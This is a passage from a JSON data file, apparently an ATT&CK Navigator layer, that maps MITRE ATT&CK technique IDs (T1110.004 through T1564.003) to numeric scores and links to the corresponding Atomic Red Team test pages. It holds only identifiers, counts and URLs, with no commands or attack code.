Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.004/T1110.004.md"}]},{"techniqueID":"T1112","score":48,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1112/T1112.md"}]},{"techniqueID":"T1113","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1113/T1113.md"}]},{"techniqueID":"T1114","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114/T1114.md"}]},{"techniqueID":"T1114.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.001/T1114.001.md"}]},{"techniqueID":"T1114.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1114.003/T1114.003.md"}]},{"techniqueID":"T1115","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1115/T1115.md"}]},{"techniqueID":"T1119","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1119/T1119.md"}]},{"techniqueID":"T1120","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1120/T1120.md"}]},{"techniqueID":"T1123","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1123/T1123.md"}]},{"techniqueID":"T1124","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1124/T1124.md"}]},{"techniqueID":"T1125","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1125/T1125.md"}]},{"techniqueID":"T1127","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md"}]},{"techniqueID":"T1127.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127.001/T1127.001.md"}]},{"techniqueID":"T1132","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132/T1132.md"}]},{"techniqueID":"T1132.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1132.001/T1132.001.md"}]},{"techniqueID":"T1133","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1133/T1133.md"}]},{"techniqueID":"T1134","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134/T1134.md"}]},{"techniqueID":"T1134.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.001/T1134.001.md"}]},{"techniqueID":"T1134.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.002/T1134.002.md"}]},{"techniqueID":"T1134.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.004/T1134.004.md"}]},{"techniqueID":"T1134.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1134.005/T1134.005.md"}]},{"techniqueID":"T1135","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1135/T1135.md"}]},{"techniqueID":"T1136","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1136.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.002/T1136.002.md"}]},{"techniqueID":"T1136.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1137","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137/T1137.md"}]},{"techniqueID":"T1137.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.002/T1137.002.md"}]},{"techniqueID":"T1137.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.004/T1137.004.md"}]},{"techniqueID":"T1137.006","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1137.006/T1137.006.md"}]},{"techniqueID":"T1140","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1140/T1140.md"}]},{"techniqueID":"T1176","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1176/T1176.md"}]},{"techniqueID":"T1187","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1187/T1187.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1197","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1197/T1197.md"}]},{"techniqueID":"T1201","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1201/T1201.md"}]},{"techniqueID":"T1202","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1202/T1202.md"}]},{"techniqueID":"T1204","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204/T1204.md"}]},{"techniqueID":"T1204.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1204.002/T1204.002.md"}]},{"techniqueID":"T1207","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1207/T1207.md"}]},{"techniqueID":"T1216","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216/T1216.md"}]},{"techniqueID":"T1216.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1216.001/T1216.001.md"}]},{"techniqueID":"T1217","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1217/T1217.md"}]},{"techniqueID":"T1218","score":74,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218/T1218.md"}]},{"techniqueID":"T1218.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.001/T1218.001.md"}]},{"techniqueID":"T1218.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.002/T1218.002.md"}]},{"techniqueID":"T1218.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.003/T1218.003.md"}]},{"techniqueID":"T1218.004","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.004/T1218.004.md"}]},{"techniqueID":"T1218.005","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":41,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":86,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":43,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":18,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"links":[{"label":"View 